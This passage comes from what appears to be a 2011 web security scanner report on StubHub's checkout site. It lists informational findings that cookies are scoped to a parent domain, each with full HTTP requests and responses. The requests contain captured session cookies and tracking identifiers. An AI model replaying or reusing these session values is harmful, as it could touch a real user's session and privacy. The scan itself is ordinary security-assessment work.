2%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=FBAC0A8439C11039000B8921C8DA47EC; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":9,"to":5,"c":"https://buy.stubhub.com/checkout/checkout","lc":{"d1":{"v":9,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856625066,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:44:28 GMT
Server: Apache
Set-Cookie: TLTHID=1C7871DA39C21039A743871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1598
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/resources/mojito/css/common/stubtool.css wa
...[SNIP]...

3.8. https://buy.stubhub.com/checkout/services/delivery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/delivery

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/delivery HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E4093A0A39C110390346A44E82BE9735; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
com-stubhub-dye: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.9. https://buy.stubhub.com/checkout/services/payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/payment

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/payment HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E43BE44639C11039023DF003EA6CA026; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.10. https://buy.stubhub.com/checkout/services/reviewSubmit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/reviewSubmit

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/reviewSubmit HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E472A54439C1103903BEE205A91C2150; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.11. https://buy.stubhub.com/help/services/popUp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /help/services/popUp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/services/popUp HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:43:10 GMT
Server: Apache
Set-Cookie: TLTHID=EE39049C39C11039003090BE30AA5CCD; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
com-stubhub-dye: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.12. https://buy.stubhub.com/howToEnableJavaScript.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /howToEnableJavaScript.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /howToEnableJavaScript.html HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E4A3421C39C1103978D494000C1CF856; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Content-Length: 1064
Vary: Accept-Encoding
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>How to enable JavaScript</title>
<style
...[SNIP]...

3.13. https://buy.stubhub.com/modules/js/referdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /modules/js/referdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/js/referdetect.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Tue, 17 Oct 2006 21:47:35 GMT
Accept: */*
